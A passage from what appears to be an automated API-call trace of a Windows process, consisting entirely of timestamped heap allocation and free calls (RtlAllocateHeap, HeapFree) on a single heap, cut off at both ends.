hHeap=0xc50000) returned 1 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79368 | out: hHeap=0xc50000) returned 1 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79480 | out: hHeap=0xc50000) returned 1 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78cd8 | out: hHeap=0xc50000) returned 1 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79138 | out: hHeap=0xc50000) returned 1 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73b70 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc760b8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75de8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc757b8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75e78 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f08 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75a88 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75ba8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc759f8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76418 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f98 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75b18 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76388 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76028 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc758d8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75c38 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75cc8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75848 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76148 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75d58 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc762f8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc761d8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76268 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc764a8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76538 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc765c8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75728 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc78368 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc783f8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc787e8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc78518 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc781b8 [0030.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc78878 [0030.803] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760b8 | out: hHeap=0xc50000) returned 1 [0030.803] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75de8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc757b8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75e78 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f08 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a88 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ba8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc759f8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76418 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f98 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b18 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76388 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76028 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc758d8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c38 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75cc8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75848 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76148 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75d58 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc762f8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc761d8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76268 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc764a8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76538 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765c8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75728 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78368 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc783f8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc787e8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78518 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc781b8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78878 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75968 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78aa8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b18 | out: hHeap=0xc50000) returned 1 [0030.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75de8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f08 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc759f8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75e78 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc758d8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75cc8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a88 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f98 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765c8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76028 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76268 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b18 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ba8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76388 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc757b8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c38 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760b8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76148 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc761d8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc762f8 | out: hHeap=0xc50000) returned 1 [0031.284] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75848 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76418 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc764a8 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76538 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75728 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77e58 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77dc8 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77ca8 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77f78 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc786c8 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78758 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75d58 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79598 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc56ed0 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc797c8 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73b28 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79250 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75a88 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79480 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a88 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75458 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73b40 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75458 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc75698 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73b40 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79020 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.285] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.286] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.286] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79250 | out: hHeap=0xc50000) returned 1 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79480 | out: hHeap=0xc50000) returned 1 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc797c8 | out: hHeap=0xc50000) returned 1 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79020 | out: hHeap=0xc50000) returned 1 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73b28 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc79480 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c48 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79020 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc765c8 [0031.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0031.287] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79250 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765c8 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75488 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73b70 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75488 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc75c38 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73b70 | out: 